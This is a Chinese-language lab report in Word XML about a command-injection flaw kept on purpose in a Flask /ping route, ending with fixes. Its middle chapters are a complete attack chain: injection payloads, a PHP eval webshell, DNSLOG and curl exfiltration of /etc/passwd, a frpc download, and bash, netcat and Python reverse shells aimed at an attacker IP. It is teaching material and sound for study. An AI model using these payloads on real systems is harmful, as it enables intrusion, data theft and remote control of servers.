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48"/>
        </w:rPr>
        <w:t>命令注入漏洞分析与修复报告</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>DNSLOG · 反弹Shell · frp内网穿透 · 一句话木马 · bash反弹</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>实验日期：2026年7月</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>版本管理说明</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>本文档为初稿评审阶段版本，配套代码（app.py/app_fixed.py）仍在同步修改中。待所有review意见处理完成后，将统一提交至GitHub仓库。请勿在评审完成前将当前版本上传。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120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第1章  背景：在已有系统中新增Ping功能</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第2章  命令注入漏洞概述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第3章  /ping 漏洞代码分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第4章  Web验证：判断命令注入是否成功</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第5章  一句话木马测试与上传</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第6章  DNSLOG外带数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第7章  frp内网穿透 + NC反弹Shell（串联流程）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第8章  高版本NC反弹（无-e参数）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第9章  bash反弹Shell完整实战</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第10章  前端页面修改说明</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第11章  修复方案详解</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第12章  修复前后代码对比</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第一章  背景：在已有系统中新增Ping功能</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>本项目为基于Flask的用户管理系统，已包含登录、注册、搜索、文件上传、个人中心、充值、商城、管理面板、动态页面加载、密码修改、SSRF URL抓取等多项功能。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>本次迭代新增了网络诊断功能（/ping路由），允许已登录用户通过Web界面进行网络连通性测试。出于教学演示目的，该功能代码中故意保留了命令注入漏洞，用于完整展示攻击与防御的全过程。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1.1 三版本代码说明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文件名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说明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漏洞状态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app.py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主运行版本（有漏洞）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保留全部漏洞供教学演示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app_pre_fix.py</w:t>
              <w:br/>
              <w:t xml:space="preserve"> （漏洞备份版）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备份的漏洞版本，与app.py内容相同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保留全部漏洞，供对照参考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app_fixed.py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安全修复版本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实施全部修复措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>注意事项：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 本文档配套的代码仍处于评审阶段，待最终确认后统一上传仓库</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• app.py故意保留漏洞用于教学，生产环境请务必使用app_fixed.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第二章  命令注入漏洞概述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>命令注入（Command Injection）是OWASP Top 10中最危险的漏洞之一，CVSS 3.0评分9.8（Critical）。攻击者通过在用户输入中注入恶意命令，在服务器端以Web进程权限执行任意系统命令。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 漏洞根因</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>命令注入的根因是应用程序将用户输入直接拼接到系统命令中执行，未做任何过滤或转义。在Python中，使用 subprocess.check_output(cmd, shell=True) 且通过字符串拼接构建命令时，攻击者可注入管道符执行额外命令。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 命令注入符号速查表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符号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含义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示例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;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命令分隔符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ping 8.8.8.8; whoami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先ping再执行whoami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|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管道符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ping 8.8.8.8|whoami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将ping输出管道给whoami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&amp;&amp;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与运算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ping 8.8.8.8&amp;&amp;whoami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ping成功后才执行whoami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||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或运算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ping x.x.x.x||whoami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ping失败才执行whoami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`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反引号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ping `whoami`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先执行whoami再ping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$()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命令替换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ping $(whoami)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先执行whoami再ping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第三章  /ping 漏洞代码分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 漏洞代码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import subprocess</w:t>
        <w:br/>
        <w:br/>
        <w:t>@app.route("/ping", methods=["GET", "POST"])</w:t>
        <w:br/>
        <w:t>def ping():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ip_input = request.form.get("ip", "")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # ⚠️ f-string字符串拼接</w:t>
        <w:br/>
        <w:t xml:space="preserve">    cmd = f"ping -c 3 {ip_input}"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    output = subprocess.check_output(cmd, shell=True,</w:t>
        <w:br/>
        <w:t xml:space="preserve">        timeout=30, stderr=subprocess.STDOUT)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.2 漏洞点列表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编号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漏洞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严重度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C-01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字符串拼接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🔴高危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f"ping -c 3 {ip}" 可注入;|&amp;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C-02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shell=True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🔴高危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启用shell解析，管道符被解释执行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C-03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无输入过滤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🔴高危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IP参数可包含任意字符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C-04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超时30秒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🟡中危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足够执行下载/反弹Shell等操作</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第四章  Web验证：判断命令注入是否成功</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.1 操作步骤</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>在浏览器中按以下步骤验证命令注入是否存在：</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Step 1：登录系统 → 进入 Ping 测试页面（/ping）</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Step 2：输入正常IP，测试Ping功能是否正常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输入: 8.8.8.8</w:t>
        <w:br/>
        <w:t>预期: 返回64 bytes from 8.8.8.8 ...（Ping正常结果）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Step 3：输入带注入命令的payload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输入: 8.8.8.8; whoami</w:t>
        <w:br/>
        <w:t>预期: 在Ping结果下方会出现 whoami 的输出</w:t>
        <w:br/>
        <w:t xml:space="preserve">      （如 root，说明命令注入成功）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Step 4：观察返回结果判断注入状态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返回现象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判断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Ping结果 + whoami输出同时出现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注入成功 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可执行任意命令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只显示Ping结果，无whoami输出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可能被过滤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需尝试其他符号;|`$()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返回空白或500错误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命令执行失败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检查输入是否合法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返回'输入包含非法字符'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存在WAF防护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需尝试绕过WAF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请求超时（30秒以上）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网络阻塞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可能是ping不通或命令卡住</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.2 验证不同的注入符号</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>如果 ; 被过滤，尝试其他符号：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管道符</w:t>
        <w:br/>
        <w:t>8.8.8.8 | whoami</w:t>
        <w:br/>
        <w:br/>
        <w:t># 反引号</w:t>
        <w:br/>
        <w:t>8.8.8.8 `whoami`</w:t>
        <w:br/>
        <w:br/>
        <w:t># 命令替换</w:t>
        <w:br/>
        <w:t>8.8.8.8 $(whoami)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第五章  一句话木马测试与上传</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.1 一句话木马原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>一句话木马（WebShell）是一段极短的恶意代码，攻击者将其写入服务器文件，通过HTTP请求参数控制服务器执行任意命令。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.2 通过命令注入写入木马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写入PHP一句话木马到上传目录</w:t>
        <w:br/>
        <w:t>ip=8.8.8.8; echo '&lt;?php @eval($_POST["cmd"]); ?&gt;' &gt; static/uploads/shell.php</w:t>
        <w:br/>
        <w:br/>
        <w:t># 写入ASP一句话木马</w:t>
        <w:br/>
        <w:t>ip=8.8.8.8; echo '&lt;% response.write("hello") %&gt;' &gt; static/uploads/shell.asp</w:t>
        <w:br/>
        <w:br/>
        <w:t># 写入Python一句话</w:t>
        <w:br/>
        <w:t>ip=8.8.8.8; echo 'import os;os.system("whoami")' &gt; static/uploads/shell.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.3 验证木马上传成功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方式1：通过curl验证</w:t>
        <w:br/>
        <w:t>curl http://127.0.0.1:5000/static/uploads/shell.php</w:t>
        <w:br/>
        <w:br/>
        <w:t># 方式2：通过SSRF的/fetch-url验证（需登录）</w:t>
        <w:br/>
        <w:t>POST /fetch-url</w:t>
        <w:br/>
        <w:t>url=http://127.0.0.1:5000/static/uploads/shell.php</w:t>
        <w:br/>
        <w:br/>
        <w:t># 方式3：通过路径穿越验证</w:t>
        <w:br/>
        <w:t>GET /page?name=../static/uploads/shell.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.4 连接一句话木马</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>上传成功后，可使用以下工具连接WebShell：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工具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功能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连接地址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蚁剑（AntSword）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图形化WebShell管理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http://目标/shell.php 密码:cmd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冰蝎（Behinder）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加密流量WebShell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http://目标/shell.php 密钥:xxx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curl命令行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快速命令执行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curl -X POST -d 'cmd=system("id");' http://目标/shell.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第六章  DNSLOG外带数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.1 DNSLOG原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>DNSLOG是一种无法直接出HTTP流量时的数据外带技术。攻击者将数据编码到DNS请求域名中，DNSLOG平台记录解析日志，攻击者通过查看日志获取数据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>常用DNSLOG平台：ceye.io、dnslog.cn、burpcollaborator.net</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.2 利用命令注入触发DNSLOG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假设已在 ceye.io 注册，获得域名: abc123.ceye.io</w:t>
        <w:br/>
        <w:br/>
        <w:t># Step1: 验证DNSLOG平台连通性</w:t>
        <w:br/>
        <w:t>ip=8.8.8.8; ping -c 1 `whoami`.abc123.ceye.io</w:t>
        <w:br/>
        <w:br/>
        <w:t># 在ceye.io后台查看DNS解析记录</w:t>
        <w:br/>
        <w:t># 如果看到 root.abc123.ceye.io 说明DNSLOG可用</w:t>
        <w:br/>
        <w:br/>
        <w:t># Step2: 外带文件内容（base64编码到域名中）</w:t>
        <w:br/>
        <w:t>ip=8.8.8.8; curl http://`cat /etc/passwd | base64 -w0`.abc123.ceye.io</w:t>
        <w:br/>
        <w:br/>
        <w:t># Step3: curl -F 外带数据库文件</w:t>
        <w:br/>
        <w:t>ip=8.8.8.8; curl -F "file=@/etc/passwd" http://攻击者IP:8080/upload</w:t>
        <w:br/>
        <w:br/>
        <w:t># Kali端接收（启动nc监听）</w:t>
        <w:br/>
        <w:t>nc -lvnp 8080</w:t>
        <w:br/>
        <w:t># 收到: POST /upload ... Content-Type: multipart/form-data ...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第七章  frp内网穿透 + NC反弹Shell（串联流程）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.1 场景说明</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>内网服务器的Shell无法直接反弹到公网Kali（无公网IP或防火墙限制）。frp作为隧道工具解决此问题——通过在公网VPS部署frps服务端，内网受害机运行frpc客户端建立隧道，Kali通过frps的转发端口获得稳定的NC反向连接。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.2 完整串联流程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┌──────────┐    隧道     ┌──────────┐    NC连接   ┌──────────┐</w:t>
        <w:br/>
        <w:t>│ 受害机   │◄─frpc─frps─►│ 公网VPS  │◄────nc────►│  Kali    │</w:t>
        <w:br/>
        <w:t>│ (内网)   │  隧道建立    │ (frps)   │  反弹shell  │ (攻击者)  │</w:t>
        <w:br/>
        <w:t>└──────────┘             └──────────┘             └──────────┘</w:t>
        <w:br/>
        <w:br/>
        <w:t>攻击链路：命令注入→下载frpc→建立隧道→Kali监听→获得Shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.3 Kali端（公网VPS）配置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假设公网VPS的IP为 1.2.3.4</w:t>
        <w:br/>
        <w:br/>
        <w:t># frps.ini（服务端配置）</w:t>
        <w:br/>
        <w:t>[common]</w:t>
        <w:br/>
        <w:t>bind_port = 7000</w:t>
        <w:br/>
        <w:br/>
        <w:t># 启动frps</w:t>
        <w:br/>
        <w:t>./frps -c frps.ini &amp;</w:t>
        <w:br/>
        <w:br/>
        <w:t># Kali本地监听NC，等待反弹Shell</w:t>
        <w:br/>
        <w:t>nc -lvnp 4444</w:t>
        <w:br/>
        <w:br/>
        <w:t># 连接流程:</w:t>
        <w:br/>
        <w:t># 受害机→frpc→连接1.2.3.4:7000→frps建立隧道→</w:t>
        <w:br/>
        <w:t># Kali的nc连接127.0.0.1:4444→隧道转发→</w:t>
        <w:br/>
        <w:t># 受害机将bash反弹到127.0.0.1:4444→</w:t>
        <w:br/>
        <w:t># Kali收到来自受害机的Shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.4 受害机（通过命令注入）执行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⚠️ 以下所有命令通过POST /ping的ip参数注入执行</w:t>
        <w:br/>
        <w:t># 假设Kali的公网IP为 1.2.3.4，frps运行在 0.0.0.0:7000</w:t>
        <w:br/>
        <w:br/>
        <w:t># Step1: 下载frpc到/tmp目录</w:t>
        <w:br/>
        <w:t>ip=8.8.8.8; wget http://1.2.3.4:8080/frpc_linux_amd64 -O /tmp/frpc</w:t>
        <w:br/>
        <w:t>ip=8.8.8.8; chmod +x /tmp/frpc</w:t>
        <w:br/>
        <w:br/>
        <w:t># Step2: 写入frpc配置（用echo逐行写入）</w:t>
        <w:br/>
        <w:t>ip=8.8.8.8; echo '[common]' &gt; /tmp/frpc.ini</w:t>
        <w:br/>
        <w:t>ip=8.8.8.8; echo 'server_addr = 1.2.3.4' &gt;&gt; /tmp/frpc.ini</w:t>
        <w:br/>
        <w:t>ip=8.8.8.8; echo 'server_port = 7000' &gt;&gt; /tmp/frpc.ini</w:t>
        <w:br/>
        <w:t>ip=8.8.8.8; echo '[shell]' &gt;&gt; /tmp/frpc.ini</w:t>
        <w:br/>
        <w:t>ip=8.8.8.8; echo 'type = tcp' &gt;&gt; /tmp/frpc.ini</w:t>
        <w:br/>
        <w:t>ip=8.8.8.8; echo 'local_ip = 127.0.0.1' &gt;&gt; /tmp/frpc.ini</w:t>
        <w:br/>
        <w:t>ip=8.8.8.8; echo 'local_port = 4444' &gt;&gt; /tmp/frpc.ini</w:t>
        <w:br/>
        <w:t>ip=8.8.8.8; echo 'remote_port = 4444' &gt;&gt; /tmp/frpc.ini</w:t>
        <w:br/>
        <w:br/>
        <w:t># Step3: 后台启动frpc隧道</w:t>
        <w:br/>
        <w:t>ip=8.8.8.8; nohup /tmp/frpc -c /tmp/frpc.ini &gt; /tmp/frpc.log 2&gt;&amp;1 &amp;</w:t>
        <w:br/>
        <w:br/>
        <w:t># Step4: 反弹Shell（通过frp隧道转发到Kali）</w:t>
        <w:br/>
        <w:t>ip=8.8.8.8; bash -i &gt;&amp; /dev/tcp/1.2.3.4/4444 0&gt;&amp;1</w:t>
        <w:br/>
        <w:br/>
        <w:t># Kali端看到连接后即可执行命令</w:t>
        <w:br/>
        <w:t># whoami → root  (确认获得Shell)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第八章  高版本NC反弹（无-e参数）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>新版Netcat（nmap-ncat）不带 -e 参数，以下为替代方案：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8.1 方法1：bash + NC（mkfifo）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ip=8.8.8.8; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2&gt;&amp;1|nc 攻击者IP 4444 &gt;/tmp/f</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8.2 方法2：mknod + NC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ip=8.8.8.8; mknod /tmp/backpipe p; /bin/bash 0&lt;/tmp/backpipe | nc 攻击者IP 4444 1&gt;/tmp/backpipe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8.3 方法3：Python一行反弹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ip=8.8.8.8; python3 -c 'import socket,subprocess;\</w:t>
        <w:br/>
        <w:t>s=socket.socket();s.connect(("攻击者IP",4444));\</w:t>
        <w:br/>
        <w:t>subprocess.call(["/bin/bash","-i"],stdin=s.fileno(),\</w:t>
        <w:br/>
        <w:t>stdout=s.fileno(),stderr=s.fileno())'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第九章  bash反弹Shell完整实战</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>9.1 标准bash反弹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Kali监听</w:t>
        <w:br/>
        <w:t>nc -lvnp 4444</w:t>
        <w:br/>
        <w:br/>
        <w:t># 受害机执行</w:t>
        <w:br/>
        <w:t>ip=8.8.8.8; bash -i &gt;&amp; /dev/tcp/攻击者IP/4444 0&gt;&amp;1</w:t>
        <w:br/>
        <w:br/>
        <w:t># 符号含义</w:t>
        <w:br/>
        <w:t># bash -i              → 交互式bash</w:t>
        <w:br/>
        <w:t># &gt;&amp; /dev/tcp/IP/PORT → stdout+stderr重定向到TCP</w:t>
        <w:br/>
        <w:t># 0&gt;&amp;1                → stdin重定向到stdout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>9.2 完整攻击链（含具体IP示例）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>假设场景：Kali公网IP为1.2.3.4，受害机为内网192.168.1.100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Step1: 发现并验证命令注入</w:t>
        <w:br/>
        <w:t>ip=8.8.8.8; whoami</w:t>
        <w:br/>
        <w:t># 返回: root ← 确认注入成功，当前为root权限</w:t>
        <w:br/>
        <w:br/>
        <w:t># Step2: 写入一句话木马</w:t>
        <w:br/>
        <w:t>ip=8.8.8.8; echo '&lt;?php @eval($_POST[\"cmd\"]); ?&gt;' &gt; static/uploads/s.php\n\n# Step3: 启动frp隧道</w:t>
        <w:br/>
        <w:t>ip=8.8.8.8; wget http://1.2.3.4:8080/frpc -O /tmp/frpc</w:t>
        <w:br/>
        <w:t>ip=8.8.8.8; chmod +x /tmp/frpc</w:t>
        <w:br/>
        <w:t>ip=8.8.8.8; echo '[common]' &gt; /tmp/frpc.ini</w:t>
        <w:br/>
        <w:t>ip=8.8.8.8; echo 'server_addr = 1.2.3.4' &gt;&gt; /tmp/frpc.ini</w:t>
        <w:br/>
        <w:t>ip=8.8.8.8; echo 'server_port = 7000' &gt;&gt; /tmp/frpc.ini</w:t>
        <w:br/>
        <w:t>ip=8.8.8.8; echo '[shell]' &gt;&gt; /tmp/frpc.ini</w:t>
        <w:br/>
        <w:t>ip=8.8.8.8; echo 'type = tcp' &gt;&gt; /tmp/frpc.ini</w:t>
        <w:br/>
        <w:t>ip=8.8.8.8; echo 'local_ip = 127.0.0.1' &gt;&gt; /tmp/frpc.ini</w:t>
        <w:br/>
        <w:t>ip=8.8.8.8; echo 'local_port = 4444' &gt;&gt; /tmp/frpc.ini</w:t>
        <w:br/>
        <w:t>ip=8.8.8.8; echo 'remote_port = 4444' &gt;&gt; /tmp/frpc.ini</w:t>
        <w:br/>
        <w:t>ip=8.8.8.8; nohup /tmp/frpc -c /tmp/frpc.ini &gt; /tmp/f.log 2&gt;&amp;1 &amp;</w:t>
        <w:br/>
        <w:br/>
        <w:t># Step4: bash反弹Shell到Kali</w:t>
        <w:br/>
        <w:t>ip=8.8.8.8; bash -i &gt;&amp; /dev/tcp/1.2.3.4/4444 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第十章  前端页面修改说明</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>本次新增Ping功能涉及以下前端页面的修改：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>10.1 新增 templates/ping.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>新增独立的Ping测试页面，继承base.html，包含：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• IP地址输入框（带占位提示）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• "Ping" 按钮</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 黑色背景+绿色文字的控制台风格输出区域（pre标签）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 显示实际执行的命令（cm字段）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>10.2 修改 templates/base.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>在导航栏已登录状态菜单中添加入口：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&lt;a href="/ping" class="nav-link"&gt;Ping&lt;/a&gt;</w:t>
        <w:br/>
        <w:t>← 放在"商城"和"帮助"之间</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>10.3 修改 templates/index.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>在首页按钮工具栏中添加Ping快捷入口：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&lt;a href="/ping" class="btn"&gt;🖥️ Ping&lt;/a&gt;</w:t>
        <w:br/>
        <w:t>← 放在"商城"和"帮助"按钮之间</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第十一章  修复方案详解</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>11.1 修复1：禁止shell=True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# ✅ 参数列表形式，无shell解析</w:t>
        <w:br/>
        <w:t>subprocess.check_output(["ping", "-c", "3", ip_input], timeout=30)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>11.2 修复2：IP地址白名单+范围校验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import re</w:t>
        <w:br/>
        <w:t>IP_PATTERN = r"^(?:\d{1,3}\.){3}\d{1,3}$"</w:t>
        <w:br/>
        <w:t>if not re.match(IP_PATTERN, ip_input):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return "IP地址格式不合法"</w:t>
        <w:br/>
        <w:t>for p in ip_input.split("."):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if not (0 &lt;= int(p) &lt;= 255):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "IP段超出范围"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>11.3 修复3：输入长度限制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# ✅ IP地址最多15字符（如 255.255.255.255），拒绝超长payload</w:t>
        <w:br/>
        <w:t>if len(ip_input) &gt; 15:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return "输入超出长度限制"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
